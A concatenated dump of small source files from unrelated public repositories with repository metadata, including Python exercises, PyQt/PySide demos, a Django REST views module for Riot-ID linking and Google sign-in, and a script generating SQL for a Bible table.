"tmp": "/var/folders/rs/mxl65xfx6k96_y0nnxz0fkkc0000gn/T",
"unsafe_perm": "true",
"link": "",
"prefix": "/Users/FuD/.nvm/versions/node/v6.9.1"
}
}
| [
"dan82625@gmail.com"
] | dan82625@gmail.com |
9dfb673fc79b36b0f863db50379bde72f6854fc2 | 5f63f2956ed341f482333fd79222ee95cf6cf325 | /0x11-python-network_1/3-error_code.py | 44fb1077692face6be73caa247d4f4cb3a8b369d | [] | no_license | jgadelugo/holbertonschool-higher_level_programming | 5f50bafdeae6b9cd8d6079f03ba2183d5d3d88b4 | f0236088c85a04b1928139eda48c66014f09ac17 | refs/heads/master | 2020-07-22T23:30:18.228771 | 2020-06-03T15:38:28 | 2020-06-03T15:38:28 | 207,367,705 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | #!/usr/bin/python3
""" Sends a POST request with email and return body """
from urllib import request
import urllib.error
from sys import argv
if __name__ == "__main__":
try:
with request.urlopen(argv[1]) as r:
print(r.read().decode('UTF-8'))
except urllib.error.HTTPError as e:
print('Error code:', e.code)
| [
"845@holbertonschool.com"
] | 845@holbertonschool.com |
07b9771037edce0c4e2a570f1a9de87d16043e06 | 1f3e98e3bb36765f869ca3177a47c53ce302ec70 | /test/input/090.py | f814763b5a4cd9f1e921ce531271080e0d788d1a | [
"MIT"
] | permissive | EliRibble/pyfmt | d73dec1061e93a28ad738139edf523e1678d0e19 | e84a5531a7c06703eddd9dbc2072b0c8deae8c57 | refs/heads/master | 2020-04-01T10:57:18.521463 | 2019-05-24T21:39:18 | 2019-05-24T21:39:18 | 153,139,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11 | py | print(1/5)
| [
"eliribble@google.com"
] | eliribble@google.com |
4f538092180bbfb76794800e1033a644c8c2e551 | 275f85955acabac247fe306b0161a6d758f4d057 | /MauricioZelaya/circleOperations/perimeterCalculator.py | 1ad939e0bf030e63eb316f1c1fccb14d1fbc75a4 | [] | no_license | mauricioZelaya/QETraining_BDT_python | 295bb58a99a36b0b973afd153109c510191b4ec7 | d7cc798e7063ab32e5002e4deda3ddec8a8a0c59 | refs/heads/master | 2021-05-08T05:01:13.181273 | 2017-11-24T21:53:46 | 2017-11-24T21:53:46 | 108,473,352 | 0 | 0 | null | 2017-11-24T21:53:47 | 2017-10-26T22:43:32 | Python | UTF-8 | Python | false | false | 111 | py | from math import pi
def perimeterCalculator(radius):
return pi*radius**2
# print(perimeterCalculator(3))
| [
"zelaya.mauricio@gmail.com"
] | zelaya.mauricio@gmail.com |
23d48a400968017c6eaceec92d4ed09880e236de | 2315d3f8b2007b6716fa84d6e8794e2c8c1d7989 | /common_widgets/combobox/find_item_by_typing.py | 63e300fdba51633e617d30d2d1f5d4478568047c | [] | no_license | leoomo/Enjoy-Qt-Python-Binding | cd290efc4c8e5356e29678ef7c9e52889d96fc51 | b2994bb0c2009a459856738dc4e39a4aba534de2 | refs/heads/master | 2021-01-24T02:10:54.782505 | 2011-12-24T14:31:37 | 2011-12-24T14:31:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,192 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
"""
find item of QComboBox by typing keyword
Test environment:
Mac OS X 10.6.8
http://www.pyside.org/docs/pyside/PySide/QtGui/QComboBox.html
"""
import sys
try:
from PySide import QtCore
from PySide import QtGui
except ImportError:
from PyQt4 import QtCore
from PyQt4 import QtGui
class Demo(QtGui.QWidget):
def __init__(self):
super(Demo, self).__init__()
x, y, w, h = 500, 200, 300, 400
self.setGeometry(x, y, w, h)
self.combo = QtGui.QComboBox(self)
self.combo.resize(200, 30)
self.combo.move(20, 60)
self.combo.setEditable(True)
self.combo.setInsertPolicy(QtGui.QComboBox.NoInsert)
self.combo.currentIndexChanged.connect(self._combo_currentIndexChanged)
self.items = (
'',
('Lisp', 'lisp.png', 'llll'),
('C', 'c.png', 'cccc'),
('Objective-C', 'objc.png', 'oooo'),
('Python', 'python.png', 'pppp'),
('Java', 'java.png', 'jjjj'),
)
for i in self.items:
if isinstance(i, tuple):
fullname, icon_path, user_data = i[0], i[1], i[2]
text = fullname
self.combo.addItem(QtGui.QIcon(icon_path), text, user_data)
else:
self.combo.addItem(i)
print self.combo.itemData(0)
print self.combo.itemData(1)
print self.combo.itemData(2)
def _combo_currentIndexChanged(self, idx):
activated_idx = idx
if idx == -1:
return
item = self.items[idx]
if not item:
return
text, icon_path, user_data = item[0], item[1], item[2]
matched_idx = self.combo.findData(user_data)
assert activated_idx == matched_idx
print
print "text:", text
print "icon path:", icon_path
print "user_data:", user_data
def show_and_raise(self):
self.show()
self.raise_()
if __name__ == "__main__":
app = QtGui.QApplication(sys.argv)
demo = Demo()
demo.show_and_raise()
sys.exit(app.exec_())
| [
"shuge.lee@gmail.com"
] | shuge.lee@gmail.com |
a468fe60624b32c4061bf9e37b5a43a921d6156d | 5f89a6a1419022f3566bb326915b1da6ce4e5ad4 | /API/views/views.py | 90d4669e7e510b0c2f5779bec71e74c7b844c726 | [] | no_license | maintain0404/RelolerApi | 1377b7a125ab7e352eb461251e91616516a9f340 | b269c48c3fe4b10262fc426fbc12bb9f4df3cdc2 | refs/heads/master | 2022-12-25T13:48:50.329360 | 2020-10-11T07:38:10 | 2020-10-11T07:38:10 | 279,353,841 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,446 | py | from rest_framework.decorators import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework.parsers import JSONParser
from dynamodb_wrapper.base import DataAlreadyExistsError
from dynamodb_wrapper import User
from google_api_wrapper import oauth
import json
from drf_yasg import openapi
from drf_yasg.utils import swagger_auto_schema
from .riot_auth import get_riot_id, set_random_icon, get_riot_id_icon
import background
from google_api_wrapper import drive
# Create your views here.
# class PostView(APIView):
# def get(self, request, pk, sk):
# db = Post(pk, sk).read()
# if db:
# return Response(db, status = status.HTTP_200_OK)
# else:
# return Response(status = status.HTTP_404_NOT_FOUND)
# def patch(self, request, pk, sk):
# res = json.loads(request.body)
# db = Post(pk, sk)
# if db.update(res.get('PostTitle'),res.get('PostContent')):
# return Response(status = status.HTTP_202_ACCEPTED)
# else:
# return Response(status = status.HTTP_406_NOT_ACCEPTABLE)
# def post(self, request, pk = None, sk = None):
# return Response(status = status.HTTP_405_METHOD_NOT_ALLOWED)
# def delete(self, request, pk, sk):
# if Post(pk, sk).delete():
# return Response(status.HTTP_202_ACCEPTED)
# else:
# return Response(status = status.HTTP_406_NOT_ACCEPTABLE)
# class PostListView(APIView):
# def get(self, request):
# try:
# db = Posts()
# db.add_attributes_to_get('pk','sk','PostData.PostTitle','PostData.Nickname')
# except:
# return Response(status = status.HTTP_404_NOT_FOUND)
# else:
# return Response(db.go()['Items'], status = status.HTTP_200_OK)
# def post(self, request):
# res = json.loads(request.body)
# print(res)
# try:
# Post('testpk0', 'hi').create(res)
# except Exception:
# return Response(status = status.HTTP_400_BAD_REQUEST)
# else:
# return Response(status = status.HTTP_201_CREATED)
# def put(self, request):
# return Response(status = status.HTTP_405_METHOD_NOT_ALLOWED)
# def delete(self, request):
# return Response(status = status.HTTP_405_METHOD_NOT_ALLOWED)
# class CommentListView(APIView):
# def get(self, request, pk, sk = None):
# db = CommentList(pk).go()
# if db:
# return Response(db, status = status.HTTP_200_OK)
# else:
# return Response(status.HTTP_404_NOT_FOUND)
# def put(self, request, pk, sk = None):
# return Response(status = status.HTTP_501_NOT_IMPLEMENTED)
# def patch(self, request, pk, sk):
# return Response(status = status.HTTP_501_NOT_IMPLEMENTED)
# def delete(self, reqeust, pk, sk):
# return Response(status.HTTP_501_NOT_IMPLEMENTED)
# class UserInfoView(APIView):
# def get(self, request):
# if request.session['user_sk']:
# try:
# db_request = User(request.session['user_sk'], 'read')
# db_request.add_attributes_to_get('User','ClosedUserData')
# db_result = db_request.read()
# if db_result:
# return Response(db_result, status = status.HTTP_200_OK)
# else:
# return Response(status = status.HTTP_404_NOT_FOUND)
# except Exception as err:
# print(err)
# return Response(status = status.HTTP_400_BAD_REQUEST)
# else:
# return Response(status = status.HTTP_404_NOT_FOUND)
class RiotIDAuthView(APIView):
    """Manage the Riot IDs linked to the signed-in account.

    Requires an authenticated session ('user_sk' stored in the session).
    """
    parser_classes = (JSONParser,)

    # Swagger schema for the POST body: a single Riot account name.
    post_schema = openapi.Schema(
        properties = {'name' : openapi.Schema(
            type = openapi.TYPE_STRING,
            description = '라이엇 계정 닉네임'
        )},
        type = openapi.TYPE_OBJECT
    )

    param_name_hint = openapi.Parameter(
        'name',
        openapi.IN_BODY,
        description = '라이엇 닉네임',
        type = openapi.TYPE_STRING,
    )

    @swagger_auto_schema(
        operation_id = "User_RiotID_LIST",
        operation_description = "계정에 연결된 라이엇 계정 조회",
        responses = {
            200 : "조회 성공",
            400 : "조회 실패",
            401 : "로그인 상태가 아님"
        }
    )
    def get(self, request):
        """List the Riot IDs linked to the account, refreshing their
        authentication state on the fly (an ID becomes authenticated once
        the player has set the randomly assigned profile icon)."""
        try:
            final_res = {}
            if request.session.get('user_sk'):
                res = User.read(
                    # Fixed: partition key must be 'USER' to match every
                    # other query in this module (was 'User').
                    pk = 'USER',
                    sk = request.session['user_sk'],
                    attributes_to_get = [
                        'ClosedUserData'
                    ]
                ).execute()
                final_res = res['ClosedUserData']['RiotID']
                for idx, v in enumerate(final_res):
                    if not v['Authenticated'] and v['IconID'] == get_riot_id_icon(v['Name']):
                        User.update(
                            pk = 'USER',
                            sk = request.session['user_sk'],
                            expressions = [{
                                'utype' : 'SET',
                                # Fixed typo: path previously read 'ClolsedUserData'.
                                'path' : f'ClosedUserData.RiotID[{idx}].Authenticated',
                                'value' : True
                            }]
                        ).execute()
                        # final_res is already the RiotID list, so update the
                        # entry directly (the old code re-indexed it as a
                        # dict, which raised TypeError).
                        final_res[idx]['Authenticated'] = True
            else:
                return Response(status = status.HTTP_401_UNAUTHORIZED)
        except Exception as err:
            print(err)
            return Response(status = status.HTTP_400_BAD_REQUEST)
        else:
            return Response(final_res, status = status.HTTP_200_OK)

    @swagger_auto_schema(
        request_body = post_schema,
        operation_id = "USER_RiotID_ADD",
        operation_description = "계정에 라이엇 아이디 추가",
        responses = {
            200 : "계정에 새 라이엇 아이디 연결 성공",
            400 : "계정에 새 라이엇 아이디 연결 실패"
        }
    )
    def post(self, request):
        """Link a new Riot ID (looked up by account name) to the account."""
        try:
            res = json.loads(request.body)
            riot_id = get_riot_id(res['name'])
            riot_id_dict = dict()
            if riot_id:
                riot_id_dict['Name'] = riot_id['name']
                riot_id_dict['PUUID'] = riot_id['puuid']
                # A random icon the player must set to prove ownership.
                riot_id_dict['IconID'] = set_random_icon(riot_id)
                riot_id_dict['Authenticated'] = False
            else:
                return Response(status = status.HTTP_400_BAD_REQUEST)
            User.update(
                pk = 'USER',
                sk = request.session['user_sk'],
                expressions = [{
                    'utype' : 'LIST_APPEND',
                    'path' : 'ClosedUserData.RiotID',
                    'value' : riot_id_dict
                }]
            ).execute()
        except json.JSONDecodeError as err:
            print(err)
            return Response(status = status.HTTP_400_BAD_REQUEST)
        except KeyError as err:
            print(err)
            return Response(status = status.HTTP_400_BAD_REQUEST)
        except Exception as err:
            return Response(status = status.HTTP_501_NOT_IMPLEMENTED)
        else:
            return Response(status = status.HTTP_200_OK)

    @swagger_auto_schema(
        request_body = post_schema,
        operation_id = 'User_RiotID_DELETE',
        operation_description = "계정에 연결된 라이엇 아이디 연결 해제",
        responses = {
            200 : "연결 해제 성공",
            400 : "연결 해제 실패"
        }
    )
    def delete(self, request):
        """Unlink the Riot ID at query-string index `riot_id_index`."""
        try:
            idx = str(request.GET.get('riot_id_index'))
            User.update(
                pk = 'USER',
                sk = request.session['user_sk'],
                expressions = [{
                    'utype' : 'REMOVE',
                    'path' : f'ClosedUserData.RiotID[{idx}]',
                }]
            ).execute()
        except Exception as err:
            print(err)
            return Response(status = status.HTTP_400_BAD_REQUEST)
        else:
            return Response(status = status.HTTP_200_OK)
class SignOutView(APIView):
    """Delete every login session key for the current caller."""

    @swagger_auto_schema(
        operation_id = 'Signout',
        responses = {
            200 : '세션 삭제 성공',
            400 : '세션 삭제 실패'
        }
    )
    def get(self, request):
        """Flush the session store; 200 on success, 404 on failure."""
        try:
            request.session.flush()
        except Exception as err:
            print(err)
            return Response(status=status.HTTP_404_NOT_FOUND)
        return Response(status=status.HTTP_200_OK)
class UuidSignInView(APIView):
    """Sign in (or lazily register) a user identified by a device UUID."""
    param_uuid_hint = openapi.Parameter(
        'uuid',
        openapi.IN_QUERY,
        description = 'android uuid',
        type = openapi.TYPE_STRING
    )

    @swagger_auto_schema(
        operation_id = "SignIn_UUID",
        operation_description = "UUID를 통해 계정에 로그인",
        manual_parameters=[param_uuid_hint],
        responses = {
            200 : "로그인 성공",
            400 : "로그인 실패"
        }
    )
    def get(self, request, uuid):
        """Look the user up by UUID, creating the record on first sign-in."""
        # Fixed: the read must target the same 'uuid#...' sort key used on
        # creation, and the request has to be executed - previously the
        # un-executed request object was never None, so the account was
        # never created.
        user_info = User.read(
            pk = 'USER', sk = f'uuid#{uuid}'
        ).execute()
        if user_info is None:
            User.create(
                data = {
                    'pk' : 'USER',
                    'sk' : f'uuid#{uuid}',
                    'User' : 'nickname',
                    'ClosedUserData' : {
                        'UserEmail' : '',
                        'UserName' : '',
                        'UserLocale' : '',
                        'RiotID' : []
                    }},
                overwrite = False
            ).execute()
        request.session['user_sk'] = f'uuid#{uuid}'
        return Response(status = status.HTTP_200_OK)
class GoogleSignInUriView(APIView):
    """Return the Google OAuth sign-in page URI."""
    param_redirect_uri_hint = openapi.Parameter(
        'redirect_uri',
        openapi.IN_QUERY,
        description = '로그인 과정이 끝난 후 리다이렉트될 uri',
        type = openapi.TYPE_STRING
    )

    response_redirect_uri = openapi.Schema(
        type = openapi.TYPE_OBJECT,
        # Fixed: the keyword was misspelled 'propreties', so the documented
        # schema was rendered without its properties.
        properties = {
            'google_openid_uri' : openapi.Schema(
                type = openapi.TYPE_STRING,
                description = "구글 로그인 URI"
            )
        },
        required = ['google_openid_uri']
    )

    @swagger_auto_schema(
        operation_id = "SignIn_Google_URI",
        operation_description = "구글 로그인 페이지 URI",
        manual_parameters=[param_redirect_uri_hint],
        responses = {
            200 : response_redirect_uri,
            400 : 'URI 받아오기 실패'
        }
    )
    def get(self, request):
        """Hand back the authorization URL the client should open."""
        result = {}
        result['google_openid_uri'] = oauth.authorization_url
        return Response(result, status = status.HTTP_200_OK)
# google oauth 웹용으로 쓰던 것
class GoogleSignInView(APIView):
    """Google OAuth sign-in.

    If the caller is currently signed in via a device UUID, the UUID record
    is migrated to the Google identity and the UUID sign-in stops working.
    When called with no parameters, responds with the Google sign-in URL.
    """
    param_google_token_hint = openapi.Parameter(
        'google_token',
        openapi.IN_QUERY,
        description = 'google oauth 액세스 토큰',
        type = openapi.TYPE_STRING
    )

    @swagger_auto_schema(
        operation_id = 'SignIn_Google',
        operation_description = "토큰 방식 및 코드 방식의 구글 Oauth 로그인 처리",
        manual_parameters=[param_google_token_hint],
        responses = {
            200 : "구글 로그인 성공",
            401 : "유효하지 않은 토큰 혹은 코드"
        })
    def get(self, request):
        idinfo = {}
        result = {}
        # Resolve the Google identity from either an id token or an OAuth
        # redirect; with no parameters just hand back the sign-in URL.
        try:
            if request.GET.get('google_token'):
                idinfo = oauth.verify_id_token(request.GET.get('google_token'))
            elif request.GET.get('state'):
                idinfo = oauth.get_info_from_uri(request.build_absolute_uri())
            else:
                result['google_openid_url'] = oauth.authorization_url
                return Response(result, status = status.HTTP_200_OK)
        except oauth.InvalidTokenError as err:
            return Response(status = status.HTTP_401_UNAUTHORIZED)
        # Look the user up by Google id first, then by the legacy UUID key.
        user_info = User.read(
            pk = 'USER', sk = f"google#{idinfo['sub']}",
        ).execute()
        if user_info is None and request.GET.get('uuid'):
            user_info = User.read(
                pk = 'USER', sk = f"uuid#{request.GET['uuid']}",
            ).execute()
        # First sign-in: create the user record.
        if user_info is None:
            User.create(
                data = {
                    'pk' : 'USER',
                    'sk' : f'google#{idinfo["sub"]}',
                    'User' : '',
                    'ClosedUserData' : {
                        'UserEmail' : idinfo['email'] if idinfo.get('email') else '',
                        'UserName' : idinfo['name'],
                        'UserLocale' : idinfo['locale'],
                        'RiotID' : []
                    }},
                overwrite = False
            ).execute()
        # Migrate a UUID-keyed record to the Google identity.
        elif 'uuid' in user_info['sk']:
            User.update(
                pk = 'USER', sk = user_info['sk'],
                expressions = [{
                    'utype' : 'SET', 'path' : 'sk', 'value' : f"google#{idinfo['sub']}",
                    'overwrite' : True
                }]
            ).execute()  # fixed: the update was built but never executed
        request.session['user_sk'] = f"google#{idinfo['sub']}"
        # NOTE(review): assumes the oauth helpers always put 'access_token'
        # in idinfo - verify for the verify_id_token path.
        request.session['google_access_token'] = idinfo['access_token']
        return Response(result, status = status.HTTP_200_OK)
class UserInfoView(APIView):
    """Read and update a user's profile information."""
    userinfo_schema = openapi.Schema(
        type = openapi.TYPE_OBJECT,
        # Fixed: the keyword was misspelled 'propreties', so the documented
        # schema was rendered without its properties.
        properties = {
            'nickname' : openapi.Schema(
                type = openapi.TYPE_STRING,
                description = "사용할 닉네임"
            )
        },
        required = ['nickname']
    )

    @swagger_auto_schema(
        operation_id = 'UserInfo_GET',
        operation_description = "유저 정보 확인하기, 자신의 계정이라면 추가로 정보가 보임",
        responses = {
            200 : "구글 로그인 성공",
            404 : "존재하지 않는 유저 혹은 기타 에러"
        })
    def get(self, request, logintype, userid, *args, **kargs):
        """Return the public profile; include private data for the owner."""
        atbt2get = ['User']
        # session.get avoids a KeyError (-> HTTP 500) for anonymous callers.
        if request.session.get('user_sk') == f'{logintype}#{userid}':
            atbt2get.append('ClosedUserData')
        try:
            res = User.read(
                pk = 'USER',
                sk = f'{logintype}#{userid}',
                attributes_to_get = atbt2get
            ).execute()
        except Exception as err:
            print(err)
            return Response(status = status.HTTP_404_NOT_FOUND)
        else:
            return Response(res, status = status.HTTP_200_OK)

    @swagger_auto_schema(
        request_body = userinfo_schema,
        operation_id = 'UserInfo_PUT',
        operation_description = "토큰 방식 및 코드 방식의 구글 Oauth 로그인 처리",
        responses = {
            200 : "구글 로그인 성공",
            401 : "자신이 아닌 다른 유저 정보에 접근",
            404 : "존재하지 않는 유저 혹은 기타 에러"
        })
    def put(self, request, userid, *args, **kargs):
        """Update the caller's nickname; only the owner may modify it."""
        if request.session.get('user_sk') != userid:
            return Response(status = status.HTTP_401_UNAUTHORIZED)
        if request.POST.get('nickname'):
            try:
                User.update(
                    pk = 'USER',
                    sk = userid,
                    expressions = [{
                        'utype' : 'SET',
                        'path' : 'User',
                        # Fixed: the new value must be passed under 'value'
                        # (it was mistakenly keyed 'nickname'), matching every
                        # other update expression in this module.
                        'value': request.POST.get('nickname'),
                        'overwrite': True
                    }
                    ]
                ).execute()  # fixed: the update was built but never executed
            except Exception as err:
                print(err)
                return Response(status = status.HTTP_400_BAD_REQUEST)
            else:
                return Response(status = status.HTTP_200_OK)
        else:
            return Response(status = status.HTTP_400_BAD_REQUEST)
class GoogleDriveView(APIView):
    @swagger_auto_schema(
        operation_id = 'GoogleDrive_List',
        operation_description = "구글 드라이브 내의 Reloler 영상 조회",
        responses = {
            200 : "조회 성공",
            400 : "조회 실패"
        })
    def get(self, request):
        """List the Reloler videos stored in the user's Google Drive."""
        try:
            # Fixed: the session store is request.session (was
            # request.sessions, which raised AttributeError and always
            # produced the error branch).
            video_list = drive.Drive(request.session['google_access_token']).list()
        except Exception:
            return Response(status = status.HTTP_404_NOT_FOUND)
        # Fixed: pass the status through the Response constructor; assigning
        # to `.status` does not set the HTTP status code.
        return Response(video_list, status = status.HTTP_200_OK)
| [
"maintain0404@gmail.com"
] | maintain0404@gmail.com |
84f66a0bf9e3af5d28f84b3115109b132927b474 | d66818f4b951943553826a5f64413e90120e1fae | /hackerearth/Algorithms/Chandu and chandni's secret chat/solution.py | 5347d87bca861f96880c7fd9b656c67c7b40092f | [
"MIT"
] | permissive | HBinhCT/Q-project | 0f80cd15c9945c43e2e17072416ddb6e4745e7fa | 19923cbaa3c83c670527899ece5c3ad31bcebe65 | refs/heads/master | 2023-08-30T08:59:16.006567 | 2023-08-29T15:30:21 | 2023-08-29T15:30:21 | 247,630,603 | 8 | 1 | MIT | 2020-07-22T01:20:23 | 2020-03-16T06:48:02 | Python | UTF-8 | Python | false | false | 605 | py | """
# Sample code to perform I/O:
name = input() # Reading input from STDIN
print('Hi, %s.' % name) # Writing output to STDOUT
# Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail
"""
# Write your code here
# Number of test cases on the first line of STDIN.
t = int(input())
for _ in range(t):
    # s: encoded word, k: 1-based rank selecting the starting index.
    s, k = input().strip().split()
    k = int(k)
    # Indices of s ordered by their character, descending; this ordering is
    # the permutation used to walk through the encoded string.
    idxes = list(range(len(s)))
    idxes.sort(key=lambda i: s[i], reverse=True)
    # Start from the index holding the k-th largest character.
    idx = idxes[k - 1]
    word = ''
    for _ in range(len(s)):
        word += s[idx]
        # Follow the permutation to the next character.
        idx = idxes[idx]
    # Rotate the last collected character to the front.
    word = word[-1] + word[:-1]
    print(word)
| [
"hbinhct@gmail.com"
] | hbinhct@gmail.com |
b5854b8c41c172ede9cd5c98028caf21c9168d24 | 6e96feb90eebfb717a13b6704fff801e2a5505cc | /26-Remove-Duplicates-from-Sorted-Array/removeDuplicate.py | bc52c3327f6a777a0c41535a384ea898ec420110 | [] | no_license | chriszeng8/LeetCode | af6e0864efec61a9eb02a031dbc9b5d744e2e086 | 06b6ff3492e4df0521b0ea7eca17c9d270723e97 | refs/heads/master | 2020-05-22T01:17:34.011002 | 2017-03-24T02:49:50 | 2017-03-24T02:49:50 | 61,896,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 599 | py | class Solution(object):
def removeDuplicates(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
num_len = len(nums)
if num_len<=1:
return(num_len)
# store the largest num
largest_num = nums[0]
counter = 1
for i in range(1,num_len):
if nums[i]>largest_num:
largest_num = nums[i]
nums[counter] = nums[i]
counter = counter + 1
# nums = nums[:counter]
print nums
return counter
nums = [10,10,20,20,30]
print Solution().removeDuplicates(nums) | [
"chriszeng8@hotmail.com"
] | chriszeng8@hotmail.com |
1d7e55b823dfc9a936cd03ef7140b1adb134ea2b | 73a86edc84cb804bc522053c88b2a997c00f6e13 | /function.py | 904eac1fcf8ab284a0324378ad9e6cd903b0e0d4 | [] | no_license | aarthymurugappan101/python | 3b1fafad4db7a49d0f742934b8d958838b310ed9 | 2459241c2fb4f92f797ea45f5e931f3f8e174dc6 | refs/heads/master | 2020-06-25T00:50:53.904242 | 2019-08-12T11:21:08 | 2019-08-12T11:21:08 | 199,145,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 789 | py | # def getInput():
# rank= int(input("plesse enter your rank"))
# return rank
# def printPrize(rank):
# if rank == 1:
# prize = "1000"
# elif rank == 2:
# prize = "800"
# elif rank == 3:
# prize = "700"
# elif rank ==4:
# prize = "300"
# elif rank == 5:
# prize = "300"
# else:
# prize = "20"
# print("your prize money is"+str(prize))
# r=getInput()
# printPrize(r)
def getInput():
    # Prompt the user for a Fahrenheit temperature; returns it as a float
    # (raises ValueError on non-numeric input).
    farenhiet = float(input("please enter the farenhiet value"))
    return farenhiet
def convertCelcius(farenhiet):
    # Convert Fahrenheit to Celsius and print it rounded to 2 decimals.
    celcius = 5/9*(farenhiet-32)
    print(round(celcius,2))
# Script flow: read a temperature, then print its Celsius equivalent.
i=getInput()
convertCelcius(i)
"noreply@github.com"
] | noreply@github.com |
9d847003b12e4878b7bf1d7a2f45e57b2e4e8a05 | 6142db5163ca0187585ecb9cba1f41b75aa9f272 | /messenger/GUI.py | 08646663c7c7f3b6aa5ec623dc7144cdf9605389 | [] | no_license | Zily88/git-repo | 429cc72c79a5f326e450ccf20e41131885b152fe | d40539293141fda8bf6222e726af98dd8e3f2eb7 | refs/heads/master | 2020-03-07T01:48:17.816487 | 2018-05-09T16:29:19 | 2018-05-09T16:29:19 | 127,193,398 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | from PyQt5 import QtWidgets
from MainWindow import Ui_Form
from NotMainWindow import Ui_Form2
class MainWindow(QtWidgets.QWidget):
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.ui = Ui_Form()
self.ui.setupUi(self)
class NotMainWindow(QtWidgets.QDialog):
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.ui = Ui_Form2()
self.ui.setupUi(self)
if __name__ == '__main__':
import sys
app = QtWidgets.QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_()) | [
"nesterov_vladimir@rambler.ru"
] | nesterov_vladimir@rambler.ru |
47509e13562fec04be941d6672debdb3a56e8a8c | db4a874b1d7b44a1c190e95816d9ca38a705465b | /manage.py | b69bd7197c8e221ce07fb061e1de7eef303a2376 | [] | no_license | aborgesrodrigues/portfolio_performance | 964cf4b957e363f5f6c9e47f4c627b758a0cb847 | 3c6e8c96fa5d08cb7576986719d18726a8badd89 | refs/heads/master | 2023-08-30T08:05:14.579012 | 2023-08-29T23:07:54 | 2023-08-29T23:07:54 | 231,388,300 | 0 | 0 | null | 2022-11-08T19:22:39 | 2020-01-02T13:32:53 | Python | UTF-8 | Python | false | false | 641 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run administrative tasks via Django's command-line dispatcher."""
    # Point Django at this project's settings module unless the caller
    # already chose one via the environment.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'portfolio_performance.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        # Re-raise with a friendlier hint; `from exc` keeps the original
        # cause in the traceback.
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)


if __name__ == '__main__':
    main()
| [
"alessandro.rodrigues@ifto.edu.br"
] | alessandro.rodrigues@ifto.edu.br |
b2b80179d0f8ddc7a76ed005cbc3670219bb8091 | 28f0dc2b48ed019dfef08d84e842c5d75e116dfc | /Versions/Release.2.x.x/py/OBSOLETE/BibleTable.py | cced9d9f98a8cb768a4c415715efb06a18c3eb2b | [
"MIT",
"LicenseRef-scancode-public-domain"
] | permissive | garygriswold/SafeBible | 9da0e8d89cb08888b8cf48773b4b3860086c49f7 | 2d378e84cbd6b81641bcccd6ba66699d24208548 | refs/heads/master | 2022-02-25T19:41:10.367183 | 2019-08-22T03:35:02 | 2019-08-22T03:35:02 | 34,028,119 | 0 | 0 | MIT | 2019-10-30T07:11:44 | 2015-04-16T01:40:19 | TSQL | UTF-8 | Python | false | false | 3,942 | py | #
# This program generates SQL statements to create and populate the Bible table
# This was previously called the Version table
#
import io
import os
import json
# Emit the DDL: drop and recreate the Bible table, one column per write.
out = io.open("sql/bible.sql", mode="w", encoding="utf-8")
out.write(u"DROP TABLE IF EXISTS Bible;\n")
out.write(u"CREATE TABLE Bible (\n")
out.write(u" bibleId TEXT NOT NULL PRIMARY KEY,\n") # info.json filename[5:18]
out.write(u" code TEXT NOT NULL,\n") # info.json abbr
out.write(u" abbr TEXT NOT NULL,\n") # info.json abbr char 4-6
out.write(u" iso3 TEXT NOT NULL REFERENCES Language(iso3),\n") # info.json lang
out.write(u" name TEXT NOT NULL,\n") # info.json name
out.write(u" englishName TEXT NULL,\n") # info.json nameEnglish
out.write(u" localizedName TEXT NULL,\n") # Google Translate API
out.write(u" direction TEXT CHECK (direction IN('ltr','rtl')) default('ltr'),\n") # info.json dir
out.write(u" script TEXT NULL,\n") # info.json script
out.write(u" country TEXT NULL REFERENCES Country(code),\n") # info.json countryCode
out.write(u" s3Bucket TEXT NOT NULL,\n") # this program
out.write(u" s3KeyPrefix TEXT NOT NULL,\n") # info.json filename
out.write(u" s3Key TEXT NULL,\n") # %I_%O_%B_%C.html
# I cannot find program, which generated this template: s3KeyTemplate.py
out.write(u" s3CredentialId TEXT NULL,\n") # TBD
out.write(u" otDamId TEXT NULL,\n") # BibleUpdateDamId.py
out.write(u" ntDamId TEXT NULL,\n") # BibleUpdateDamId.py
out.write(u" stylesheet TEXT NOT NULL);\n") # constant stylesheet
prefix2 = "INSERT INTO Bible (bibleId, code, abbr, iso3, name, englishName, direction, script, country, s3Bucket, s3KeyPrefix, s3Key, stylesheet) VALUES"
stylesheet = "BibleApp2.css"
# read and process all info.json files
source = "/Users/garygriswold/ShortSands/DBL/FCBH_info/"
filelist = sorted(os.listdir(source))
for filename in filelist:
	#if len(filename) != 28:
	#print(len(filename), filename)
	#else:
	# Only well-formed info.json filenames (fixed length) are processed.
	if len(filename) == 28:
		#print(filename)
		input2 = io.open(source + filename, mode="r", encoding="utf-8")
		data = input2.read()
		bible = json.loads(data)
		bibleId = filename[5:18]
		# check type to see if == bible
		bType = bible['type']
		if bType != 'bible':
			print "?? Type = ", bType
		# check abbr to see if different from bibleId
		code = bible['abbr']
		# remove lang code from abbr
		abbr = code[3:]
		# check that lang == first 3 letters of bibleId
		iso3 = bible['lang']
		if iso3.upper() != code[0:3]:
			print "?? abbr=", code, " iso3=", iso3
		iso3 = iso3.lower()
		# Escape single quotes for SQL string literals.
		name = bible['name'].replace("'", "''")
		englishName = bible['nameEnglish'].replace("'", "''")
		direction = bible['dir']
		# convert script to iso 15924 code
		script = bible.get('script')
		validScripts = [None, 'Arab', 'Beng', 'Bugi', 'Cans', 'Cyrl', 'Deva', 'Ethi', 'Geor',
